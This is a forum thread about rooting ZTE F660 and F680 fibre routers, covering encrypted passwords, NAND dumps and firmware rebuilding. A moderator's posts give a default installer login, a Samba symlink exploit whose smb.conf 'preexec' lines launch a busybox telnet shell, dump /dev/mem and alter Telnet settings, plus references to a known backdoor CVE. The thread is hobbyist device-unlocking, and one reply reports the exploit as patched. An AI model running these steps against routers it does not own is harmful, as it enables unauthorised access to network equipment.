ZTE ZXHN F660 - Power to the masses
-
- Мнения: 4
- Регистриран на: 02 Май 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
Hello,
We have another problem, I have got F660v5 running firmware "t38" and the passwords are encrypted! When you print infirmation with sendcmd (by TTL) passwords are in asterisk.
I rolled back to the first FW and I got the passwords without problem but is different in the latest firmware.
I guess the new F670 have got the encryption too.
Do you know something about this?
We have another problem, I have got F660v5 running firmware "t38" and the passwords are encrypted! When you print infirmation with sendcmd (by TTL) passwords are in asterisk.
I rolled back to the first FW and I got the passwords without problem but is different in the latest firmware.
I guess the new F670 have got the encryption too.
Do you know something about this?
- error_404
- Глобален модератор
- Мнения: 360
- Регистриран на: 22 Дек 2012 10:58
Re: ZTE ZXHN F660 - Power to the masses
Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!
of course with root which you mention you've gained
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!
Код за потвърждение: Избери целия код
sed -i "s|TS_Enable" val="0"|TS_Enable" val="1"|g" /userconfig/cfg/db_default_cfg.xml
-
- Мнения: 4
- Регистриран на: 02 Май 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
Yes, I know. I changed the password but I want an easy way to access as admin without open the ONT...In consecuence, know the original password.error_404 написа: ↑22 Авг 2018 20:09 Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!of course with root which you mention you've gainedКод за потвърждение: Избери целия код
sed -i "s|TS_Enable" val="0"|TS_Enable" val="1"|g" /userconfig/cfg/db_default_cfg.xml
Do you know where's is stored the hash?
Thanks!
-
- Мнения: 4
- Регистриран на: 02 Май 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
Today I found a new firmware on F660 v5.2... V5.2.10P3T52
I can't enter by TTL because now root/root don't work anymore. Telnet is closed by LAN too...
I think we haven't got more options now, what do you think?
My idea now is dump the NAND, is a F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.
I can't enter by TTL because now root/root don't work anymore. Telnet is closed by LAN too...
I think we haven't got more options now, what do you think?
My idea now is dump the NAND, is a F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.
- error_404
- Глобален модератор
- Мнения: 360
- Регистриран на: 22 Дек 2012 10:58
For historic archive: WebShell Command Exploit
Just Путин some exploit which was not working anymore, but for historic reasons and knowledge!
https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/
web_shell_cmd.gch
Routersploit Module
f460_f660_backdoor.py
https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/
web_shell_cmd.gch
Routersploit Module
f460_f660_backdoor.py
- error_404
- Глобален модератор
- Мнения: 360
- Регистриран на: 22 Дек 2012 10:58
-
- Мнения: 1
- Регистриран на: 21 Юни 2020 18:56
Re: ZTE ZXHN F660 - Power to the masses
Hello to everybody...it' a nice article and helps a lot. I am trying to create my firmware by dumping from my mtdblocks
My ZTE is ZXHN h267A h.v 1.1
# cat /proc/mtd
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"
I saved my mtdblock0 (whole flash) to my computer with the help of tftp server
i tried to binwalk the mtdblock0 and i really found the start of magic header 99 99 99 99 44 44 44 44
i compared the chunks in memory and i found the part that contains the kernel and rootfs...i created my upgrade.bin with these two (in mtdblock0 they are concatenated already)
I don't have the original firmware but i compare with another firmware for the H267A from another country (different IPS provider)
The size of my created firmware is a little smaller that the original i found...
Please help...did i miss something?
I binwalk the original firmware but the unsquashfs_all doen't support the file system...so i can't decompress...i do all the work in hex viewer and by SSH my router...
Thanks in advance!
My ZTE is ZXHN h267A h.v 1.1
# cat /proc/mtd
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"
I saved my mtdblock0 (whole flash) to my computer with the help of tftp server
i tried to binwalk the mtdblock0 and i really found the start of magic header 99 99 99 99 44 44 44 44
i compared the chunks in memory and i found the part that contains the kernel and rootfs...i created my upgrade.bin with these two (in mtdblock0 they are concatenated already)
I don't have the original firmware but i compare with another firmware for the H267A from another country (different IPS provider)
The size of my created firmware is a little smaller that the original i found...
Please help...did i miss something?
I binwalk the original firmware but the unsquashfs_all doen't support the file system...so i can't decompress...i do all the work in hex viewer and by SSH my router...
Thanks in advance!
- error_404
- Глобален модератор
- Мнения: 360
- Регистриран на: 22 Дек 2012 10:58
ZTE ZXHN F680 - Update for the masses
Hello boys and gils,
a long long time ago I have too much time to play with F660, but......now ANTEL are taking the step to change the old F660 with the brand new F680 [better WiFi + extender option and can handle up to 800 Mbits), so the new challange is about to begin....
I'll try the samba exploiting method first as well and of course using UART for debugging and to found some new treasures....
As you know F660 is already covered to the max w/o the firmwares which will be nice to have some repository of different firmwares as is very common product for PON providers worldwide.....
HINT and TIP:
Use USB with symbolic link to exploit SAMBA and enbale it on the F680 with instalador/wwzz2233
Look on internet for how to modify the smb.conf on the fly and how to make reverse telnet....
[will make telnet to listen on port 2323]
Also obtan BusyBox for the current harware architecture (arm71 or MIPS) and copy as 2 files same content 1:1 - busybox and sh ....(yes we'll use BusyBox as SHELL
On the USB drive apart from the symbolic link you must have both files which are the same.
(this is public vailable information and is everywhere trust me, credits goes to the authors)
Something like this:
Make a dump of the memory:
This is very raw raw material and mostly notes as I'm waiting for the hardware to attach the UART and DEBUG the dEVIL
a long long time ago I have too much time to play with F660, but......now ANTEL are taking the step to change the old F660 with the brand new F680 [better WiFi + extender option and can handle up to 800 Mbits), so the new challange is about to begin....
I'll try the samba exploiting method first as well and of course using UART for debugging and to found some new treasures....
As you know F660 is already covered to the max w/o the firmwares which will be nice to have some repository of different firmwares as is very common product for PON providers worldwide.....
HINT and TIP:
Use USB with symbolic link to exploit SAMBA and enbale it on the F680 with instalador/wwzz2233
Код за потвърждение: Избери целия код
ln -s /var/samba/lib/smb.conf
Код за потвърждение: Избери целия код
preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:2323 -l /mnt/usb2_1_1/sh
Also obtan BusyBox for the current harware architecture (arm71 or MIPS) and copy as 2 files same content 1:1 - busybox and sh ....(yes we'll use BusyBox as SHELL
On the USB drive apart from the symbolic link you must have both files which are the same.
(this is public vailable information and is everywhere trust me, credits goes to the authors)
Something like this:
Код за потвърждение: Избери целия код
preexec = /bin/sh -c '(sendcmd 1 DB set TelnetCfg 0 UserTypeFlag 0 && sendcmd 1 DB save) 2> /mnt/usb1_1/cmd.err > /mnt/usb1_1/cmd.out'
Код за потвърждение: Избери целия код
preexec = /bin/cat /dev/mem > /mnt/usb1_1/ramf680.txt
-
- Мнения: 4
- Регистриран на: 02 Май 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
The samba exploit is patched in the latest version of F680, V6.0.20P3N8.
- error_404
- Глобален модератор
- Мнения: 360
- Регистриран на: 22 Дек 2012 10:58
Re: ZTE ZXHN F660 - Power to the masses
sadly I know that and for this reason and for lack of free time this was abandoned from me, but hey you can try it harder via JTAG It's still accesible and yes some HP employee (ANTEL stuff) is watching this topic and take counter measures....
Best wishes to the new 2023
Best wishes to the new 2023